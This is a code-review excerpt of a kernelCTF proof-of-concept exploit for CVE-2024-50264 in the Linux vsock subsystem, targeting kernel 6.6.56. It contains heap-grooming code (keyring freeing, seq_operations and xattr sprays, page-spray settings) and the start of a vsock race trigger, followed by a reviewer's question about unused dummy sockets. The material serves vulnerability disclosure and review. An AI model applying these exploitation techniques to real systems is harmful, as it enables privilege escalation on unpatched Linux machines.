pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/lts-6.6.56/exploit.c

```diff
@@ -0,0 +1,877 @@
+}
+
+void victim_slab_to_buddy()
+{
+	struct timespec tp;
+	// clock_gettime(CLOCK_BOOTTIME , &tp);
+	// printf("[%lld.%lld] victim_slab_to_buddy start\n", tp.tv_sec, tp.tv_nsec);
+	for(int i = 0; i < user_key_payload_counter; i++)
+		remove_keyring(user_key_payloads[i]);
+	clock_gettime(CLOCK_BOOTTIME , &tp);
+	printf("[%lld.%lld] victim_slab_to_buddy end\n", tp.tv_sec, tp.tv_nsec);
+}
+
+#define SEQ_FILE_CNT 0x300
+int seqfd[SEQ_FILE_CNT];
+
+void spray_seq_operations()
+{
+	struct timespec tp;
+	// clock_gettime(CLOCK_BOOTTIME , &tp);
+	// printf("[%lld.%lld] spray_seq_operations start\n", tp.tv_sec, tp.tv_nsec);
+	for (int i = 0; i < SEQ_FILE_CNT; i++) 
+		seqfd[i] = open("/proc/self/stat", O_RDONLY);
+	clock_gettime(CLOCK_BOOTTIME , &tp);
+	printf("[%lld.%lld] spray_seq_operations end\n", tp.tv_sec, tp.tv_nsec);
+}
+
+void cleanup_seqs()
+{
+	for (int i = 0; i < SEQ_FILE_CNT; i++) 
+		close(seqfd[i]);
+}
+
+
+#define FILENAME_LEN 0x100
+#define FILENAME_PREFIX "/tmp/a"
+#define XATTR_PADDING_STR "A"
+void spray_xattrs(int uniquenum, int cnt)
+{
+	char file_name[FILENAME_LEN];
+	char value_name[XATTR_VALUE_KMALLOC_CG_8K];
+    char attribute_name[XATTR_VALUE_KMALLOC_CG_8K];
+	struct timespec tp;
+
+	// clock_gettime(CLOCK_BOOTTIME , &tp);
+	// printf("[%lld.%lld] spray_xattrs start\n", tp.tv_sec, tp.tv_nsec);
+
+	snprintf(file_name, FILENAME_LEN, "%s-%08d", FILENAME_PREFIX, uniquenum);
+	close(creat(file_name, 0644));
+
+	for (uint64_t i = 0; i < cnt; i++) {
+		snprintf(value_name, XATTR_VALUE_KMALLOC_CG_8K, "security.value%05lu-%s", i, XATTR_PADDING_STR);
+		snprintf(attribute_name, XATTR_VALUE_KMALLOC_CG_8K, "security.attr%12lu-%s", 3, XATTR_PADDING_STR);
+		create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_96, true);
+    }
+
+	clock_gettime(CLOCK_BOOTTIME , &tp);
+	printf("[%lld.%lld] spray_xattrs end\n", tp.tv_sec, tp.tv_nsec);
+}
+
+int kill_count = 1;
+static inline size_t rdtsc_begin(void)
+{
+#if defined(ARM64)
+  return rdtsc();
+#else
+  size_t a, d;
+  asm volatile ("mfence");
+  asm volatile ("rdtsc" : "=a" (a), "=d" (d));
+  a = (d<<32) | a;
+  asm volatile ("lfence");
+  return a;
+#endif
+}
+
+static inline size_t rdtsc_end(void)
+{
+#if defined(ARM64)
+  return rdtsc();
+#else
+  size_t a, d;
+  asm volatile ("lfence");
+  asm volatile ("rdtsc" : "=a" (a), "=d" (d));
+  a = (d<<32) | a;
+  asm volatile ("mfence");
+  return a;
+#endif
+}
+
+// #define PHYS_LO_32 0x1000000
+// #define PHYS_LO_32 0x90000000
+uint64_t PHYS_LO_32 = 0x2200000;
+
+#define N_PAGESPRAY 0x500
+#define MMAP_SIZE 0x400000
+void *page_spray[N_PAGESPRAY];
+
+int race_trigger(void *arg)
+{
+	struct sockaddr_vm connect_addr = {0};
+	struct sockaddr_vm listen_addr = {0};
+	struct sockaddr_vm dummy_addr = {0};
+	pid_t conn_pid, listen_pid;
+
+	alloc_sockets();
+
+	int socket_a = socket(AF_VSOCK, SOCK_SEQPACKET, 0);
+	int socket_b = socket(AF_VSOCK, SOCK_SEQPACKET, 0);
+	int socket_dummy1 = socket(AF_VSOCK, SOCK_SEQPACKET, 0);
```

Comment:
These dummy sockets are not used. What's their purpose? Remove them or comment their purpose here.